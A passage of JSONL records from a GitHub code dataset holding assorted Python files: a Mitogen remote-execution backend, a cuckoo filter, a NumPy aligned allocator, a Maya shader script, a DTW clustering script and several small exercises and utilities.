= DataExporter()\r\n\r\n def test_export_data(self):\r\n data = {\"test\": \"data\"}\r\n filename = \"test_export_data.json\"\r\n self.data_exporter.export_data(data, filename)\r\n self.assertTrue(os.path.exists(filename))\r\n os.remove(filename)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"ai1967rs/etsybots","sub_path":"plant/tests/test_data_exporter.py","file_name":"test_data_exporter.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9143257662","text":"from __future__ import annotations\nfrom typing import Dict, Optional, Sequence, Generator, Any, BinaryIO, ContextManager\nimport collections\nimport contextlib\nimport threading\nimport logging\nimport uuid\nimport io\ntry:\n import mitogen\n import mitogen.core\n import mitogen.master\n import mitogen.service\n import mitogen.parent\nexcept ModuleNotFoundError:\n mitogen = None\nfrom .. 
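
# The round-robin assignment above (groups[i % groups.count()]) cycles device
# numbers through the available groups; with 3 groups (illustrative):
assert [i % 3 for i in range(1, 5)] == [1, 2, 0, 1]
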
import actions\nfrom ..fileasset import FileAsset, LocalFileAsset, ZipFileAsset\nfrom .system import System, PipelineInfo\nfrom .pipeline import LocalPipelineMixin\nfrom .local import LocalExecuteMixin\n\nlog = logging.getLogger(__name__)\n\n_this_system_lock = threading.Lock()\n_this_system = None\n\n\nif mitogen is None:\n\n class Mitogen(System):\n def __init__(self, *args, **kw):\n raise NotImplementedError(\"the mitogen python module is not installed on this system\")\n\nelse:\n class MitogenCachedFileAsset(FileAsset):\n def __init__(self, cached: bytes, serialized: Dict[str, Any]):\n super().__init__()\n self.cached = cached\n self.serialized = serialized\n\n def serialize(self) -> Dict[str, Any]:\n return self.serialized\n\n @contextlib.contextmanager\n def open(self) -> ContextManager[BinaryIO]:\n with io.BytesIO(self.cached) as buf:\n yield buf\n\n def copy_to(self, dst: BinaryIO):\n dst.write(self.cached)\n\n class MitogenFileAsset(FileAsset):\n def __init__(self, local_mitogen: \"LocalMitogen\", remote_path: str):\n super().__init__()\n self.local_mitogen = local_mitogen\n self.remote_path = remote_path\n\n def serialize(self) -> Dict[str, Any]:\n res = super().serialize()\n res[\"type\"] = \"local\"\n res[\"path\"] = self.remote_path\n return res\n\n @contextlib.contextmanager\n def open(self) -> ContextManager[BinaryIO]:\n with io.BytesIO() as buf:\n self.copy_to(buf)\n buf.seek(0)\n yield buf\n\n def copy_to(self, dst: BinaryIO):\n ok, metadata = mitogen.service.FileService.get(\n context=self.local_mitogen.parent_context,\n path=self.remote_path,\n out_fp=dst,\n )\n if not ok:\n raise IOError(f'Transfer of {self.remote_path!r} was interrupted')\n\n class LocalMitogen(LocalExecuteMixin, LocalPipelineMixin, System):\n def __init__(self, parent_context: mitogen.core.Context, router: mitogen.core.Router):\n super().__init__(\"local_mitogen\")\n self.parent_context = parent_context\n self.router = router\n\n def remap_file_asset(self, asset: FileAsset):\n if asset.cached is not None:\n return MitogenCachedFileAsset(asset.cached, asset.serialize())\n elif isinstance(asset, LocalFileAsset):\n return MitogenFileAsset(self, asset.path)\n # elif isinstance(asset, ZipFileAsset):\n # return MitogenZipFileAsset(self, asset.archive, asset.path)\n else:\n raise NotImplementedError(f\"Unable to handle File asset of type {asset.__class__!r}\")\n\n class Mitogen(System):\n \"\"\"\n Access a system via Mitogen\n \"\"\"\n internal_broker = None\n internal_router = None\n\n def __init__(self, name: str, method: str, router: Optional[mitogen.master.Router] = None, **kw):\n super().__init__(name)\n if router is None:\n if self.internal_router is None:\n self.internal_broker = mitogen.master.Broker()\n self.internal_router = mitogen.master.Router(self.internal_broker)\n router = self.internal_router\n self.router = router\n self.file_service = mitogen.service.FileService(router)\n self.pool = mitogen.service.Pool(router=self.router, services=[self.file_service])\n\n meth = getattr(self.router, method, None)\n if meth is None:\n raise KeyError(f\"connection method {method!r} not available in mitogen\")\n\n kw.setdefault(\"python_path\", \"/usr/bin/python3\")\n self.context = meth(remote_name=name, **kw)\n\n self.pending_actions = collections.deque()\n\n def close(self):\n self.context.shutdown(wait=True)\n\n def share_file(self, pathname: str):\n self.file_service.register(pathname)\n\n def share_file_prefix(self, pathname: str):\n self.file_service.register_prefix(pathname)\n\n def execute(self, action: 
actions.Action) -> actions.Action:\n res = self.context.call(self._remote_run_actions, self.router.myself(), action.serialize())\n return actions.Action.deserialize(res)\n\n def send_pipelined(self, action: actions.Action, pipeline_info: PipelineInfo):\n \"\"\"\n Execute this action as part of a pipeline\n \"\"\"\n serialized = action.serialize()\n serialized[\"__pipeline__\"] = pipeline_info.serialize()\n self.pending_actions.append(\n self.context.call_async(self._remote_run_actions, self.router.myself(), serialized)\n )\n\n def receive_pipelined(self) -> Generator[actions.Action, None, None]:\n \"\"\"\n Receive results of the actions that have been sent so far.\n\n It is ok to enqueue new actions while this method runs\n \"\"\"\n while self.pending_actions:\n yield actions.Action.deserialize(self.pending_actions.popleft().get().unpickle())\n\n def pipeline_clear_failed(self, pipeline_id: str):\n self.context.call_no_reply(self._pipeline_clear_failed, pipeline_id)\n\n def pipeline_close(self, pipeline_id: str):\n self.context.call_no_reply(self._pipeline_close, pipeline_id)\n\n def run_actions(self, action_list: Sequence[actions.Action]) -> Generator[actions.Action, None, None]:\n \"\"\"\n Run a sequence of provisioning actions in the chroot\n \"\"\"\n pipeline = PipelineInfo(str(uuid.uuid4()))\n for act in action_list:\n self.send_pipelined(act, pipeline)\n yield from self.receive_pipelined()\n\n @classmethod\n def _pipeline_clear_failed(cls, pipeline_id: str):\n global _this_system, _this_system_lock\n with _this_system_lock:\n if _this_system is None:\n return\n system = _this_system\n system.pipeline_clear_failed(pipeline_id)\n\n @classmethod\n def _pipeline_close(self, pipeline_id: str):\n global _this_system, _this_system_lock\n with _this_system_lock:\n if _this_system is None:\n return\n system = _this_system\n system.pipeline_close(pipeline_id)\n\n @classmethod\n @mitogen.core.takes_router\n def _remote_run_actions(\n self,\n context: mitogen.core.Context,\n action: actions.Action,\n router: mitogen.core.Router = None) -> Dict[str, Any]:\n\n global _this_system, _this_system_lock\n with _this_system_lock:\n if _this_system is None:\n _this_system = LocalMitogen(parent_context=context, router=router)\n system = _this_system\n\n pipeline_info = action.pop(\"__pipeline__\", None)\n\n # Convert LocalFileAsset to something that fetches via Mitogen\n file_assets = action.get(\"__file_assets__\", None)\n if file_assets is None:\n file_assets = []\n\n action = actions.Action.deserialize(action)\n for name in file_assets:\n setattr(action, name,\n system.remap_file_asset(\n getattr(action, name)))\n\n if pipeline_info is None:\n action = system.execute(action)\n else:\n pipeline = PipelineInfo.deserialize(pipeline_info)\n action = system.execute_pipelined(action, pipeline)\n return action.serialize()\n","repo_name":"spanezz/transilience","sub_path":"transilience/system/mitogen.py","file_name":"mitogen.py","file_ext":"py","file_size_in_byte":8294,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"54"} +{"seq_id":"41891893320","text":"import sys\nimport json\nimport re\n\ndef load_json(path):\n\twith open(path, \"r\") as j:\n\t\treturn json.load(j)\n\t\t\ndef save_json(data, path):\n\twith open(path, \"w\") as j:\n\t\tjson.dump(data, j)\n\t\t\ndef option_to_dict(string):\n\tdesc = re.findall('\\*([^*]+)\\*', string)\n\tif len(desc) > 0:\n\t\tdesc = desc[0]\n\telse:\n\t\tdesc = \"\"\n\tname = \" \".join(string.replace('*' + desc + '*', 
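
# Worked example for option_to_dict as defined in this record (illustrative):
# the regex pulls out the *description*, and the remainder becomes the name.
# option_to_dict("verbose *print extra logs*")
# -> {"desc": "print extra logs", "name": "verbose"}
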
\"\").split())\n\td = {}\n\tif len(desc) > 0:\n\t\td[\"desc\"] = desc\n\tif len(name) > 0:\n\t\td[\"name\"] = name\n\t#print(\"name: \", name,\"desc: \", desc)\n\treturn d\n\ndef main(p_path, path, e_path, *args):\n\t#print(\"p-add_o-path: \", path)\n\t#print(\"p-add_o-e_path: \", e_path)\n\t#print(\"p-add_o-args: \", list(args))\n\t\n\tif len(args) < 4:\n\t\tprint(\"bad input\")\n\t\treturn 1\n\t\n\toptions = load_json(path + \"/.options/options.json\")\n\t\n\tflag, arg, program, *file_name = args\n\tfile_name = ' '.join(file_name)\n\t\n\tif flag[0] != '-':\n\t\tprint(\"bad input\")\n\t\treturn 1\n\t\n\tfor option in options[1:]:\n\t\tif option[\"flag\"] == flag:\n\t\t\tprint(\"bad input\")\n\t\t\treturn 1\n\t\t\t\n\tif arg == \"True\" or arg == \"False\":\n\t\tpass\n\telse:\n\t\tprint(\"bad input\", arg)\n\t\treturn 1\n\t\n\t#print(flag, arg, program, file_name)\n\t\n\tnew_command = {\"flag\": flag, \"program\": program, \"file\": file_name, \"args\": arg}\n\toptions.append(new_command)\n\tsave_json(options, path + \"/.options/options.json\")\n\t\n\t#print(data)\n\nif __name__ == \"__main__\":\n\tmain(*sys.argv)\n","repo_name":"qwality/bash-commands","sub_path":".commands/.options/add_option.py","file_name":"add_option.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28000523431","text":"# begin\t| target |\t words\t | return\n# \"hit\"\t| \"cog\"\t | [\"hot\", \"dot\", \"dog\", \"lot\", \"log\", \"cog\"] | 4\n# \"hit\"\t| \"cog\"\t | [\"hot\", \"dot\", \"dog\", \"lot\", \"log\"]\t | 0\nfrom collections import deque\n\nwords = [\"hot\", \"dot\", \"dog\", \"lot\", \"log\"]\ndef solution(begin, target, words):\n q = deque([(begin, 0)])\n visited = [False for k in range(len(words))]\n while q:\n on_prc, prc_cnt = q.popleft()\n for j, word in enumerate(words):\n cnt = 0\n for i, c in enumerate(on_prc):\n wc = word[i]\n if wc != c:\n cnt += 1\n\n if cnt > 1:\n break\n\n if cnt == 1:\n if word == target:\n return prc_cnt + 1\n if not visited[j]:\n q.append([word, prc_cnt+1])\n visited[j] = True\n\n\n\n return 0\n\nprint(solution(\"hit\", \"cog\", words))","repo_name":"yxnxj/Algorithms","sub_path":"Programmers/lv3_단어변환/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34584868647","text":"#!/usr/bin/env python\nimport os\nimport smtplib\nfrom email.mime.text import MIMEText\n\n\n\ndef sendMail(to, subject, content):\n\ttry:\n\t\tsender = \"crawler@bauman.is\"\n\n\t\tmsg = MIMEText(content)\n\t\tmsg['Subject'] = subject\n\t\tmsg['From'] = sender\n\t\tmsg['To'] = to\n\n\t\tmail = smtplib.SMTP('smtp.gmail.com', 587)\n\t\tmail.ehlo()\n\t\tmail.starttls()\n\t\tmail.login('script@dunb.lv',os.environ['DUNB_PASS'])\n\t\tmail.sendmail(sender, [to], msg.as_string())\n\texcept:\n\t\tprint (\"Sending failed\")\n\t\treturn False\n\telse:\n\t\tprint (\"Mail to \" + to + \" sent.\\nSubject: \" + subject + \"\\nMessage: \" + content)\n\t\n\tmail.quit()\n\t\n\t\n#sendMail('testing')","repo_name":"KarlBaumann/python-camera-pir","sub_path":"mailer.py","file_name":"mailer.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"19295352565","text":"\n\n# Definicion de una matriz de 3 filas x 4 columnas\nmatriz = [\n [1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12],\n]\n\n# Accesos a 
los elementos \n\nmatriz[0][0] #1\nmatriz[1][2] #7\n\n# Ejemplo funcion suma de matrices\ndef suma_matrices(A, B):\n \"\"\"\n Suma dos matrices\n Precondicion: A y B son del mismo tamaño y son matrices de numeros\n \"\"\"\n cant_filas = len(A)\n cant_cols = len(A[0])\n\n C = []\n\n for fila in range(cant_filas):\n fila_suma = []\n for col in range(cant_cols):\n fila_suma.append(A[fila][col] + B[fila][col])\n C.append(fila_suma)\n return C\n\nsuma_matrices(matriz, matriz)","repo_name":"dkippes/Python-Practicas","sub_path":"Estructuras de datos en Python/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31277088632","text":"import maya.cmds as cmds\n\ndef shadersFromObject(obj):\n cmds.select(obj, replace=True)\n cmds.hyperShade(obj, shaderNetworkSelectMaterialNode=True)\n shaders = cmds.ls(selection=True)\n return shaders\n\ndef isGeometry(obj):\n \n shapes = cmds.listRelatives(obj, shapes=True)\n shapeType = cmds.nodeType(shapes[0])\n geometryTypes = ['mesh', 'nurbsSurface', 'subdiv']\n \n if shapeType in geometryTypes:\n return True\n \n return False\n\ndef findUnattachedObjects():\n \n # Getting a list of all the obj in the scene\n objects = cmds.ls(type=\"transform\")\n\n unShaded = []\n \n # Running through the list and Checking whether a given node is geometry\n for i in range(0, len(objects)):\n # For geometric node, find the shaders applied to it\n if (isGeometry(objects)):\n shaders = shadersFromObject(objects[i])\n\n # Adding Non-shaded objects to non-shaded obj list\n if (len(shaders) < 1):\n unShaded.append(objects[i])\n\n # Create a new shader & Apply it to the shader-less obj\n newShader = cmds.shadingNode('blinn', asShader=True)\n cmds.setAttr(newShader + '.color', 0, 1, 1, type=\"double3\")\n \n cmds.select(unShaded, replace=True)\n cmds.hyperShade(assign=newShader)\n \nfindUnattachedObjects()\n","repo_name":"JaewanKim/maya-plugin","sub_path":"study/findUnattachedObject.py","file_name":"findUnattachedObject.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"44690692929","text":"from sklearn.naive_bayes import GaussianNB\nimport helper\nimport matplotlib.pyplot as plt\n\n\nif __name__ == \"__main__\":\n\n dataSet=helper.getData()\n X = ['X', 'Y', 'Z']\n Y = 'Activity'\n\n model=GaussianNB()\n helper.testModel(model,dataSet,X,Y)\n report=helper.generateReport(model,dataSet,X,Y)\n print(report)\n title = \"Learning Curves Naive Bayes\"\n helper.plot_learning_curve(model, title, dataSet[X], dataSet[Y], cv=10, n_jobs=4)\n plt.show()\n","repo_name":"haider24/ActivityClassifier","sub_path":"NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14230109400","text":"from ctypes import CDLL, c_int, c_size_t, c_void_p\nfrom ctypes.util import find_library\nimport numpy_allocator\n\nstd = CDLL(find_library('c'))\n\nstd.free.argtypes = [c_void_p]\nstd.free.restype = None\n\nstd.memalign.argtypes = [c_size_t, c_size_t]\nstd.memalign.restype = c_void_p\n\nstd.memcpy.argtypes = [c_void_p, c_void_p, c_size_t]\nstd.memcpy.restype = c_void_p\n\nstd.memset.argtypes = [c_void_p, c_int, c_size_t]\nstd.memset.restype = c_void_p\n\nstd.realloc.argtypes = [c_void_p, c_size_t]\nstd.realloc.restype = c_void_p\n\n\nclass 
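
# Quick alignment check for the libc bindings above (sketch; uses the std
# handle and the argtypes/restype declarations from this record):
ptr = std.memalign(64, 1024)
assert ptr % 64 == 0  # c_void_p restype yields a plain int address
std.free(ptr)
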
\n\n def __init__(self, alignment):\n self.alignment = alignment\n\n def __str__(self):\n return '{}({})'.format(self.__class__.__name__, self.alignment)\n\n def _calloc_(self, nelem, elsize):\n result = std.memalign(self.alignment, nelem * elsize)\n if result:\n result = std.memset(result, 0, nelem * elsize)\n return result\n\n def _malloc_(self, size):\n return std.memalign(self.alignment, size)\n\n def _realloc_(self, ptr, new_size):\n result = std.realloc(ptr, new_size)\n if result and result % self.alignment != 0:\n tmp = result\n result = std.memalign(self.alignment, new_size)\n if result:\n result = std.memcpy(result, tmp, new_size)\n std.free(tmp)\n return result\n\n\ndef main():\n from mmap import PAGESIZE\n import numpy as np\n\n with aligned_allocator(PAGESIZE) as page_aligned_allocator:\n print(page_aligned_allocator)\n\n np.core.test()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"inaccel/numpy-allocator","sub_path":"test/aligned_allocator.py","file_name":"aligned_allocator.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"}
+{"seq_id":"38400743941","text":"from contentbase.auditor import (\n AuditFailure,\n audit_checker,\n)\n\n\n@audit_checker('replicate', frame='object')\ndef audit_rep_extra_items(value, system):\n '''\n A replicate should no longer carry platform, read_length, or paired_ended;\n these belong in the schema.\n '''\n\n for item in ['platform', 'read_length', 'paired_ended']:\n\n if item in value:\n detail = 'Replicate {} has an item {}'.format(\n value['@id'],\n value[item] # ['name']\n )\n error_message = 'replicate with {}'.format(item)\n raise AuditFailure(error_message, detail, level='DCC_ACTION')\n\n\n@audit_checker('replicate', frame=['experiment'])\ndef audit_status_replicate(value, system):\n '''\n As the experiment-replicate relationship is reverse calculated, the status checker for item\n is not sufficient to catch all cases of status mismatch between replicates and experiments.\n * an in-progress replicate can't have an experiment in [proposed, released, deleted, revoked]\n * a released or revoked replicate must be in a [released or revoked] experiment\n * if the experiment is deleted, the replicate must be deleted\n '''\n\n rep_status = value['status']\n exp_status = value['experiment']['status']\n\n if ((rep_status in ['in progress'] and exp_status in ['released', 'revoked', 'proposed', 'preliminary']) or\n (rep_status in ['released', 'revoked'] and exp_status not in ['released', 'revoked']) or\n (exp_status in ['deleted'] and rep_status not in ['deleted'])):\n # If any of the three cases exist, there is an error\n detail = '{} replicate {} is in {} experiment'.format(\n rep_status,\n value['@id'],\n exp_status\n )\n raise AuditFailure('mismatched status', detail, level='DCC_ACTION')\n","repo_name":"ClinGen/clincoded","sub_path":"src/clincoded/audit/replicate.py","file_name":"replicate.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"54"}
+{"seq_id":"38075130325","text":"import random\nimport bucket\nimport exceptions\nimport hashutils\n\nclass CuckooFilter(object):\n \"\"\"\n Cuckoo hash table class.\n\n Implements insert, delete and contains operations for the filter.\n \"\"\"\n\n def __init__(self, capacity, bucket_size=4, fingerprint_size=1,\n max_displacements=500):\n \"\"\"\n Initialize CuckooFilter object.\n\n :param capacity: Size of the Cuckoo Filter\n :param bucket_size: Number of entries in a bucket
\n :param fingerprint_size: Fingerprint size in bytes\n :param max_displacements: Maximum number of evictions before filter is\n considered full\n \"\"\"\n self.capacity = capacity\n self.bucket_size = bucket_size\n self.fingerprint_size = fingerprint_size\n self.max_displacements = max_displacements\n self.buckets = [bucket.Bucket(size=bucket_size)\n for _ in range(self.capacity)]\n self.size = 0\n\n def __repr__(self):\n return '<CuckooFilter: capacity=' + str(self.capacity) + \\\n ', size=' + str(self.size) + ', fingerprint size=' + \\\n str(self.fingerprint_size) + ' byte(s)>'\n\n def __len__(self):\n return self.size\n\n def __contains__(self, item):\n return self.contains(item)\n\n def _get_index(self, item):\n \"\"\"\n Here item is a list: [value, es_id].\n \"\"\"\n index = hashutils.hash_code(item[0]) % self.capacity\n return index\n\n def _get_alternate_index(self, index, fingerprint):\n alt_index = (index ^ hashutils.hash_code(fingerprint)) % self.capacity\n return alt_index\n\n def insert(self, item):\n \"\"\"\n Insert an item into the filter.\n On insert, item is a list: [value, es_id].\n\n :param item: Item to be inserted.\n :return: True if insert is successful; CuckooFilterFullException if\n filter is full.\n \"\"\"\n fingerprint = hashutils.fingerprint(item[0], self.fingerprint_size)\n i = self._get_index(item)\n j = self._get_alternate_index(i, fingerprint)\n\n if self.buckets[i].insert([fingerprint,item[1]]):\n self.size += 1\n # print(\"inserted into bucket i: \"+str(i))\n return True\n elif self.buckets[j].insert([fingerprint,item[1]]):\n self.size += 1\n # print(\"inserted into bucket j: \"+str(j))\n return True\n\n # both candidate buckets are full: evict entries until one lands\n for _ in range(self.max_displacements):\n eviction_index = random.choice([i, j])\n f = self.buckets[eviction_index].swap([fingerprint,item[1]])\n eviction_index_1 = self._get_alternate_index(eviction_index, f[0])\n if self.buckets[eviction_index_1].insert(f):\n self.size += 1\n return True\n\n # Filter is full\n raise exceptions.CuckooFilterFullException('Insert operation failed. '\n 'Filter is full.')
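The eviction loop above depends on the partial-key identity from _get_alternate_index: applying it twice must lead back to the starting bucket, so an evicted fingerprint can be rehomed without knowing its original key. A small self-contained check of that identity (the constants are mine); note the XOR round-trip is only exact when capacity is a power of two, which the class above does not enforce:

# Standalone check of the partial-key trick behind insert()/delete().
def alt_index(index, fp_hash, capacity):
    return (index ^ fp_hash) % capacity

capacity = 1 << 10    # power of two: only then is the XOR round-trip exact
fp_hash = 727         # stand-in for hashutils.hash_code(fingerprint)
i = 421
j = alt_index(i, fp_hash, capacity)
assert alt_index(j, fp_hash, capacity) == i   # j leads straight back to i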
\n\n def contains(self, item):\n \"\"\"\n Check if the filter contains the item.\n Here item is [value, 0].\n :param item: Item to check its presence in the filter.\n :return: the stored es_id if the item is in the filter; False otherwise\n \"\"\"\n\n fingerprint = hashutils.fingerprint(item[0], self.fingerprint_size)\n i = self._get_index(item)\n j = self._get_alternate_index(i, fingerprint)\n # print('bucket before:'+str(self.buckets[i].bucket))\n list_i = []\n list_j = []\n for _ in range(len(self.buckets[i].bucket)):\n # print('length:'+str(len(self.buckets[i])))\n # print(self.buckets[i].bucket[_][0])\n list_i.append(self.buckets[i].bucket[_][0])\n for _ in range(len(self.buckets[j].bucket)):\n # print('length:'+str(len(self.buckets[j])))\n list_j.append(self.buckets[j].bucket[_][0])\n # print(list_i)\n # print(list_j)\n if fingerprint in list_i:\n # print(fingerprint)\n # print('index:' + str(list_i.index(fingerprint)))\n # print('bucket after:'+str(self.buckets[i].bucket))\n return self.buckets[i].bucket[list_i.index(fingerprint)][-1]\n elif fingerprint in list_j:\n # print(self.buckets[j].bucket)\n return self.buckets[j].bucket[list_j.index(fingerprint)][-1]\n else:\n return False\n\n def delete(self, item):\n \"\"\"\n Delete an item from the filter.\n\n To delete an item safely, it must have been previously inserted.\n Otherwise, deleting a non-inserted item might unintentionally remove\n a real, different item that happens to share the same fingerprint.\n Here item is a list: [value, es_id].\n :param item: Item to delete from the filter.\n :return: True, if item is found and deleted; False, otherwise.\n \"\"\"\n fingerprint = hashutils.fingerprint(item[0], size=self.fingerprint_size)\n i = self._get_index(item)\n j = self._get_alternate_index(i, fingerprint)\n if self.buckets[i].delete([fingerprint,item[1]]) \\\n or self.buckets[j].delete([fingerprint,item[1]]):\n self.size -= 1\n return True\n return False\n\n\n","repo_name":"Oathkeeper-ljs/biyesheji","sub_path":"cuckoofilter.py","file_name":"cuckoofilter.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"30933774818","text":"import os\nimport h5py\nimport logging\nimport my_dtw\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom constants import data_path, workplace_path, prefix_length\nfrom sklearn.cluster import SpectralClustering\nfrom sklearn.manifold import SpectralEmbedding\nfrom sklearn import mixture\nfrom sklearn.metrics import silhouette_score\nfrom my_scoring import ScoringScheme\nfrom visualization import plot_embedding, plot_scores\nfrom util import *\n\nnp.random.seed(1)\n\n\ndef load_training_data(filename):\n reads = []\n key_to_index = []\n with open(os.path.join(data_path, filename+'.txt'), 'r') as f:\n N, _ = list(map(int, f.readline().split()))\n for i in range(N):\n key = f.readline()\n key_to_index.append(key)\n reads.append(list(map(float, f.readline().split())))\n\n D = np.zeros((N, N))\n frontiers = [[] for i in range(N)]\n index_to_key = {}\n with open(os.path.join(data_path, filename+'_out_idx.csv'), 'r') as f:\n f.readline()\n for i in range(N):\n index_to_key[i] = f.readline()\n for j in range(N-1):\n frontiers[i].append(list(map(int, f.readline().split())))\n row = list(map(float, f.readline().split(',')))\n for j in range(N):\n D[i, j] = D[j, i] = row[j]\n\n return reads, D, key_to_index, index_to_key, reads, frontiers\n\n\ndef get_inverse_permutation(labels_true, labels_pred):\n N = np.max(labels_true + 1)
inverse_permutation = [-1]*N\n for i in range(N):\n majority = np.argmax(np.bincount(labels_pred[labels_true == i]))\n inverse_permutation[majority] = i\n return inverse_permutation\n\n\ndef depermutate_lables(labels_true, labels_pred):\n inverse_permutation = get_inverse_permutation(labels_true, labels_pred)\n for i in range(len(labels_pred)):\n labels_pred[i] = inverse_permutation[labels_pred[i]]\n return labels_pred\n\n\ndef get_representants(distances, labels_true, k, num_representatives):\n \"\"\"\n\n :param distances: matrix of pairwise DTW scores\n :param labels_true: ground-truth cluster labels\n :param k: number of clusters\n :param num_representatives: the number of representatives from each cluster\n :return: list of lists of representatives for each cluster\n \"\"\"\n distances = np.exp(-distances/(2*distances.std()))\n distances = distances.max() - distances\n clustering = SpectralClustering(n_clusters=k,\n assign_labels=\"discretize\",\n affinity='precomputed',\n random_state=0,\n n_jobs=4).fit(distances)\n\n print(clustering.labels_)\n labels = depermutate_lables(labels_true, clustering.labels_)\n print(labels)\n cluster_list = [(np.argwhere(labels == i)).flatten() for i in range(k)]\n cluster_sizes = [len(x) for x in cluster_list]\n\n \"\"\"\n for each cluster pick the representatives with most discriminative power, that is, the ones with\n maximal inside_barcode_mean/outside_barcode_mean scores\n \"\"\"\n representatives = []\n for cluster in range(k):\n discriminative_scores = []\n for cluster_member in cluster_list[cluster]:\n within_cluster_score = np.mean([distances[cluster_member, x] for x in cluster_list[cluster]\n if cluster_member != x])\n cross_cluster_score = np.mean([distances[cluster_member, x]\n for other_cluster in range(k) if cluster != other_cluster\n for x in cluster_list[other_cluster]])\n\n discriminative_scores.append(within_cluster_score/cross_cluster_score)\n\n discriminative_scores = sorted(enumerate(discriminative_scores), key=lambda x: x[1], reverse=True)\n #np.random.shuffle(discriminative_scores)\n # select all representatives greedily; raise selected_random above 0 to mix in random picks\n selected_random = 0\n selected_greedy = num_representatives - selected_random\n cluster_representatives = []\n # greedy selection\n for i in range(cluster_sizes[cluster] if num_representatives == -1 else selected_greedy):\n id_in_cluster = discriminative_scores[i][0]\n cluster_representatives.append(cluster_list[cluster][id_in_cluster])\n # random selection\n for i in np.random.choice(selected_greedy + np.arange(len(discriminative_scores)-selected_greedy),\n selected_random, replace=False):\n id_in_cluster = discriminative_scores[i][0]\n cluster_representatives.append(cluster_list[cluster][id_in_cluster])\n\n representatives.append(cluster_representatives)\n\n return representatives, labels, clustering.affinity_matrix_\n\n\ndef get_true_label(labels_true, labels_pred, x):\n N = np.max(labels_true + 1)\n inverse_permutation = [-1]*N\n for i in range(N):\n majority = np.argmax(np.bincount(labels_pred[labels_true == i]))\n inverse_permutation[majority] = i\n\n return inverse_permutation[x]\n\n\ndef make_validation_input(filename, representatives):\n with h5py.File(os.path.join(data_path, 'validation_dataset_big.hdf5'), 'r') as f_validation:\n print(len(list(f_validation.keys())))\n with open(os.path.join(data_path, filename+'_cluster.in'), 'w') as of:\n of.write('{} {}\\n'.format(4, len(representatives[0])))\n for i in range(4):\n for j in range(len(representatives[i])):\n starts = [x[0] for x in
frontiers[representatives[i][j]]]\n ends = [x[1] for x in frontiers[representatives[i][j]]]\n qstart = int(np.quantile(starts, 0.05))\n qend = int(np.quantile(ends, 0.95))\n print(qstart, qend)\n of.write(str(qend-qstart) + '\\n')\n of.write(' '.join(str(x) for x in reads[representatives[i][j]][qstart:qend]) + '\\n')\n\n names = []\n barcodes = []\n with open(os.path.join(workplace_path, 'all2_filtered.txt'), 'r') as all:\n lines = all.readlines()\n for line in lines:\n name, barcode = line.split()\n names.append(name)\n barcodes.append(barcode)\n\n #of.write(str(len(list(f_validation.keys()))) + '\\n')\n for i in range(len(names)):\n if names[i] not in f_validation: continue\n print(names[i])\n signal = z_normalize(trim_blank(np.array(f_validation[names[i]]).astype(float)))[:prefix_length]\n of.write('{} {}\\n'.format(names[i], barcodes[i]))\n of.write(' '.join(str(x) for x in signal) + '\\n')\n\n\ndef get_scores(filename):\n with open(os.path.join(data_path, filename)) as f:\n N, r = map(int, f.readline().split())\n names = []\n labels = []\n scores = []\n X = []\n for i in range(N):\n line = list(f.readline().split())\n # if len(line) == 1: name = line[0]\n if len(line) == 1: break\n name, label = line[0], int(line[1])\n names.append(name)\n labels.append(label)\n rating = list(map(float, f.readline().split(',')))\n scores.append(rating)\n X.append(np.argmax([\n np.mean(sorted(rating[i * r: (i + 1) * r])) for i in range(4)\n ]))\n\n X = np.array(X)\n labels = np.array(labels)\n scores = np.array(scores)\n return X, labels, scores\n\n\ndef get_label_gmm(D, k, labels_true):\n embedding = SpectralEmbedding(n_components=2, affinity='precomputed').fit_transform(D)\n gmm = mixture.GaussianMixture(n_components=k, covariance_type='full', tol=0.0001, n_init=50)\n gmm.fit(embedding)\n probs = gmm.predict_proba(embedding)\n labels_pred = np.array([np.argmax(probs[i]) for i in range(len(probs)-1)])\n corrected_labels = np.array(get_inverse_permutation(labels_true, labels_pred))\n ans = corrected_labels[np.argmax(probs[-1])]\n #plt.plot(probs[-1])\n #plt.show()\n scores_sorted = sorted(probs[-1], reverse=True)\n if scores_sorted[0] - scores_sorted[1] < 0.6:\n ans = -2\n return ans, embedding\n\n\ndef get_label_spectral(D, k, labels_true):\n clustering = SpectralClustering(n_clusters=k,\n assign_labels='discretize',\n affinity='precomputed',\n random_state=0,\n n_init=10,\n n_jobs=4).fit(D)\n labels_pred = clustering.labels_[:-1]\n inverse_permutation = get_inverse_permutation(labels_true, labels_pred)\n ans = inverse_permutation[clustering.labels_[-1]]\n return ans\n\n\ndef validate(D, representatives, scores):\n D_small = D[np.array(representatives).flatten(), :][:, np.array(representatives).flatten()]\n main_mean = np.mean([D_small[i, i] for i in range(len(D_small))])\n predictions = []\n for i in range(len(scores)):\n print(i)\n D_ = np.zeros((D_small.shape[0] + 1, D_small.shape[1] + 1))\n D_[:-1, 